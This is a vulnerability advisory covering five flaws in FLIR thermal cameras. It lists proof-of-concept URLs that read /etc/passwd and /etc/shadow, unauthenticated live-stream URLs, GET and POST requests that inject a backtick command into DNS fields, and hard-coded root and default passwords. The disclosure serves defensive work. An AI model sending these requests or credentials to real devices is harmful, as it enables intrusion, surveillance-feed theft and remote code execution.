Vulnerabilities Summary
The following advisory describes 5 (five) vulnerabilities found in FLIR Systems FLIR Thermal/Infrared Camera FC-Series S, FC-Series ID, PT-Series.
FLIR – “Best-in-class thermal cameras with on-board analytics for high-performance intrusion detection. The new FC-Series ID combines best-in-class thermal image detail and high-performance edge perimeter analytics together in a single device that delivers optimal intrusion detection in challenging environments and extreme conditions”.
The vulnerabilities found are:
- Information disclosure
- Stream disclosure
- Unauthenticated Remote Code Execution
- Authenticated Remote Code Execution
- Hard-coded Credentials
Credit
An independent security researcher, Gjoko Krstic – Zero Science Lab, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor Response
The vendor has been notified on the 27th of June 2017, several emails were exchanged, but no ETA for a fix or workaround have been provided for the following vulnerabilities.
Vulnerabilities details
Information Disclosure (1)
The FLIR web-server webroot/js/fns.login.js provides API functionality. By using the following API calls an attacker can download and read files from the FLIR OS:
- /api/xml?file=PATH-TO-FILE
- /api/file/download/PATH-TO-FILE
- /api/file/content/PATH-TO-FILE
- /api/server/videosnap?file=PATH-TO-FILE
- /page/maintenance/view/server-lan
- /api/file/ini/read
- /api/system/config/product
Proof of Concept
http://IP/api/xml?file=/etc/passwd http://IP/api/xml?file=/etc/shadow http://IP:8081/api/file/download/etc/shadow http://IP:8081/api/file/download/etc/passwd http://IP:8081/api/file/content/var/log/messages http://IP:8081/api/server/videosnap?file=../../../../../../etc/passwd http://IP:8081/page/maintenance/view/server-lan http://IP/api/file/ini/read http://IP:8081/api/system/config/product
Stream Disclosure
FLIR web-server does not validate if the user is authenticated when asked to show the live feed.
Proof of Concept
An attacker can get the live stream by sending sending the the following request:
http://IP:8081/graphics/livevideo/stream/stream3.jpg http://IP/graphics/livevideo/stream/stream1.jpg
Unauthenticated Remote Code Execution
User controlled input is not sufficiently sanitized and can be exploit by an attacker to execute command on the machine.
By sending GET request to /maintenance/controllerFlirSystem.php an attacker can trigger the vulnerability.
Proof of Concept
GET /maintenance/controllerFlirSystem.php?dns%5Bdhcp%5D=%60COMMAND-TO-EXECUTE%60&dns%5Bserver1%5D=1.2.3.4&dns%5Bserver2%5D=&_=1491052263282 HTTP/1.1
Authenticated Remote Code Execution
User controlled input is not sufficiently sanitized and can be exploit by an attacker to execute command on the machine.
By sending POST request to //page/maintenance/lanSettings/dns an attacker can trigger the vulnerability.
Proof of Concept
POST /page/maintenance/lanSettings/dns HTTP/1.1 Host: TARGET:8081 Content-Length: 64 Accept: */* Origin: http://TARGET:8081 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://TARGET:8081/maintenance Accept-Language: en-US,en;q=0.8,mk;q=0.6 Cookie: PHPSESSID=d1eabfdb8db4b95f92c12b8402abc03b DNT: 1 Connection: close dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60COMMAND-TO-EXECUTE%60
Hard-coded Credentials
root:indigo root:video default:video default:[blank] ftp:video
